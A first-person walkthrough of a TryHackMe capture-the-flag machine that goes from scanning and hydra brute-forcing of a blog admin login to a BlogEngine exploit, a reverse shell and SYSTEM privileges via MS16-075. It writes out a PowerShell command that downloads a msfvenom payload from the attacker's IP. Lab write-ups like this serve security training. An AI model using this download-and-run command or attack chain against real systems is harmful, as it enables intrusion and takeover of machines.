I’ve received an e-mail from Try Hack Me, where i found out there is a new machine listed, so i went and check it out. The room link is: THIS(Click Me). I deployed the machine and started with a port scan.
I accessed port 80, and the first question is: What’s the name of the clown?
So, i did a reverse image search using this site. I saved the image of the clown, and uploaded to the website. Accessing the first result from google and reading through the lines a little, i found out the clown name is Pennywise.
I started gobuster to find the directories that are accessible.
The one that caught my attention was the admin directory. There is a login page, which we’ll bruteforce using hydra.
To bruteforce the login page we’ll intercept the request with Burpsuite, and proceed to hydra to create the syntax.
The only thing we’ll modify in the post request is in the Username and Password field, where we’ll put ^USER^ in the username field and ^PASS^ in the password field.
The bruteforce successfully finds a valid username and password. Once logged in, we’re asked about the version of Blog Engine. We go to the admin panel, and click the About page, where there is displayed a version.
To compromise the machine, we’ll be using this exploit-db exploit: Click me
Reading about the exploit, we acknowledge that we’ll have to upload a C# named PostView.ascx and use directory traversal to receive the reverse connection. The code of the C# page is included in the exploit-db post.
To trigger the vulnerability acces the following link and receive the reverse connection.
The connection is pretty instable, and we’ll try to upgrade it to a meterpreter shell.
To do so, we’ll create a msfvenom exe payload.
I tried uploading the shell.exe using netcat with no success, but i retrieve the file using powershell. Also, before retrieving the file, i had started a python server(python -m SimpleHTTPServer 80).
The powershell syntax i used to retrieve the file is:
powershell Invoke-WebRequest -Uri http://10.8.0.212/shell.exe -Outfile shell.exe
Create your metasploit listener, and wait for the incoming connection.
To receive the connection, just type in the windows shell the name of your payload, and get back to the metasploit. In my case it’s shell.exe.
Now, let’s drop into a shell, check the systeminfo of the OS, and use windows-exploit-suggester to see if there is any exploit to escalate privileges.
Copy the output, and put in in a txt file, also the txt file should be in the windows-exploit-suggester folder. Now, run the exploit suggester to check for any vulnerability using the following syntax: ./windows-exploit-suggester.py –database <DB-NAME> –systeminfo systeminfo(or whatever you called you txt file) -l(to search only for local exploits).
We’ll be using for privesc MS16-075, which also has a metasploit module. Simply search for rotten, and the module will show up. Configure the exploit, and hit run.
If you type getuid you’ll see that you are NT AUTHORITY\SYSTEM.
Grab the user & root flag from C:\\Users\jeff\Desktop and C:\\Users\Administrator\Desktop